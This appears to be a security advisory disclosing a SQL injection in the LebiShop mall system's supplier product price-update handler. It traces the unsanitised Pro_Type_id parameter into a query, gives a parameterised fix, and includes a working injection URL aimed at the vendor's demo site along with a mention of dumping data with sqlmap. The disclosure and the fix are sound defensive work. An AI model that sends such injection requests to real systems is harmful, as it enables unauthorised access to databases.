### Summary:
LebiShop mall system, latest version: SQL injection (no. 5)
### Details:
One SQL injection point in the latest version of the LebiShop mall system.
File: Shop.supplier.Ajax.Ajax_product
```csharp
// Shop.supplier.Ajax.Ajax_product
public void Product_Batch_Price_Update()
{
    if (!base.Power("supplier_product_batch_price", "批量调价"))
    {
        base.AjaxNoPower();
        return;
    }
    string step = RequestTool.RequestString("step");
    string dateFrom = RequestTool.RequestString("dateFrom");
    string dateTo = RequestTool.RequestString("dateTo");
    // Pro_Type_id is read as a free-form string, not as an integer
    string Pro_Type_id = RequestTool.RequestString("Pro_Type_id");
    int brand = RequestTool.RequestInt("brand", 0);
    int tag = RequestTool.RequestInt("tag", 0);
    int price_markettype = RequestTool.RequestInt("price_markettype", 0);
    int price_marketvalue = RequestTool.RequestInt("price_marketvalue", 0);
    int price_marketadd = RequestTool.RequestInt("price_marketadd", 0);
    int price_costtype = RequestTool.RequestInt("price_costtype", 0);
    int price_costvalue = RequestTool.RequestInt("price_costvalue", 0);
    int price_costadd = RequestTool.RequestInt("price_costadd", 0);
    int pricetype = RequestTool.RequestInt("pricetype", 0);
    int pricevalue = RequestTool.RequestInt("pricevalue", 0);
    int priceadd = RequestTool.RequestInt("priceadd", 0);
    int addtype = RequestTool.RequestInt("addtype", 0);
    int addvalue = RequestTool.RequestInt("addvalue", 0);
    int reducetype = RequestTool.RequestInt("reducetype", 0);
    int reducevalue = RequestTool.RequestInt("reducevalue", 0);
    string mes = "";
    string where = "1=1";
    if (dateFrom != "" && dateTo != "")
    {
        string text = where;
        where = string.Concat(new string[]
        {
            text,
            " and (datediff(d,Time_Add,'",
            dateFrom,
            "')<=0 and datediff(d,Time_Add,'",
            dateTo,
            "')>=0)"
        });
        string text2 = mes;
        mes = string.Concat(new string[]
        {
            text2,
            "上架日期",
            dateFrom,
            "-",
            dateTo,
            ";"
        });
    }
    if (Pro_Type_id != "")
    {
        // the raw string is passed on to EX_Product.Categoryid and concatenated into the WHERE clause
        where = where + " and Pro_Type_id in (" + EX_Product.Categoryid(Pro_Type_id) + ")";
        mes = mes + "商品分类" + Pro_Type_id + ";";
    }
```
The Pro_Type_id parameter is read with RequestTool.RequestString("Pro_Type_id").
RequestTool.RequestString only replaces single quotes:
```csharp
// Shop.Tools.RequestTool
public static string RequestString(string nKey, string def)
{
    string ojb = HttpContext.Current.Request.QueryString[nKey];
    if (ojb != null)
    {
        return StringTool.InjectFiltrate(ojb.Trim());
    }
    ojb = HttpContext.Current.Request.Form[nKey];
    if (ojb != null)
    {
        return StringTool.InjectFiltrate(ojb.Trim());
    }
    return def;
}
// Shop.Tools.StringTool
public static string InjectFiltrate(string str)
{
    if (!StringTool.IsSafeSqlString(str))
    {
        // only the single quote is rewritten; everything else passes through unchanged
        str = str.Replace("'", "´");
    }
    return str;
}
```
Pro_Type_id then enters the EX_Product.Categoryid method; following it:
```csharp
// Shop.Bussiness.EX_Product
public static string Categoryid(string id)
{
    string str = id.ToString();
    List<Lebi_Pro_Type> ts = B_Lebi_Pro_Type.GetList("Parentid=" + id + " and IsShow = 1", "Sort desc");
    foreach (Lebi_Pro_Type t in ts)
    {
        str = str + "," + EX_Product.Categoryid(string.Concat(t.id));
    }
    return str;
}
```
Pro_Type_id finally reaches B_Lebi_Pro_Type.GetList, where it is concatenated into the condition as a bare value with no single-quote protection. Because the value sits in a numeric context ("Parentid=" + id), the quote replacement in InjectFiltrate offers no protection at all.
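As an added example (not LebiShop's code), the following shows how the Categoryid path above would look with the two fixes a reviewer would ask for: the id is validated as a positive integer before it can reach SQL, and the recursive lookup binds it as a parameter instead of concatenating it. It assumes SQL Server (the datediff/db_name calls on this page are T-SQL), a Lebi_Pro_Type table with integer columns id, Parentid, IsShow and Sort, and an already open SqlConnection; the table name is inferred from the entity class name and is an assumption.

```csharp
// Added example, not part of the LebiShop code base.
// Assumptions: SQL Server; table Lebi_Pro_Type(id, Parentid, IsShow, Sort) as integers;
// the caller supplies an open SqlConnection.
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;

public static class SafeCategory
{
    // Step 1: type-check the request value. Replacing "'" with "´" (InjectFiltrate)
    // does nothing for a numeric context such as "Parentid=" + id, so the fix is
    // to accept only a plain positive integer and reject everything else.
    public static bool TryParseCategoryId(string raw, out int id)
    {
        id = 0;
        if (string.IsNullOrWhiteSpace(raw)) return false;
        // NumberStyles.None: digits only; no sign, whitespace, separators or hex.
        return int.TryParse(raw.Trim(), NumberStyles.None, CultureInfo.InvariantCulture, out id)
               && id > 0;
    }

    // Step 2: the recursive category walk, now taking an int and binding it as a
    // parameter. Every id in the returned list came from the database, never from
    // the request, so the caller can safely join them for an IN (...) clause.
    public static List<int> CategoryIds(SqlConnection conn, int parentId)
    {
        var result = new List<int> { parentId };
        var children = new List<int>();
        using (var cmd = conn.CreateCommand())
        {
            cmd.CommandText =
                "SELECT id FROM Lebi_Pro_Type WHERE Parentid = @parentid AND IsShow = 1 ORDER BY Sort DESC";
            cmd.Parameters.Add("@parentid", SqlDbType.Int).Value = parentId;
            using (var reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                    children.Add(reader.GetInt32(0));
            }
        } // reader is closed before recursing, so a single connection suffices
        foreach (var child in children)
            result.AddRange(CategoryIds(conn, child));
        return result;
    }

    // Step 3: what the Ajax handler would call. Invalid input is rejected outright
    // rather than being folded into the WHERE clause.
    public static string BuildTypeFilter(SqlConnection conn, string rawProTypeId)
    {
        int id;
        if (!TryParseCategoryId(rawProTypeId, out id))
            throw new ArgumentException("Pro_Type_id must be a positive integer");
        var ids = CategoryIds(conn, id);
        // Joining is safe here: every element is an int produced by our own query.
        return " and Pro_Type_id in (" + string.Join(",", ids) + ")";
    }
}
```

The same pattern applies to dateFrom and dateTo in the handler: parse them as DateTime and bind them as parameters rather than relying on InjectFiltrate, since a filter that only rewrites quotes is not a substitute for typed input and parameterised queries.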
### Proof of vulnerability:
Demonstrated against the official demo site.
Returns the name of the current database:
```
http://plus.demo.lebi.cn/supplier/ajax/ajax_product.aspx?__Action=Product_Batch_Price_Update&url=/
Pro_Type_id=db_name()
```
![1.png](https://images.seebug.org/upload/201501/201638552ffddccb4f18fab2245c1cc0f964600e.png)
Returns the server name (the host name of the database server):
![2.png](https://images.seebug.org/upload/201501/201640069ec30eb57be4dede9a55e91547e43153.png)
sqlmap can then dump the data.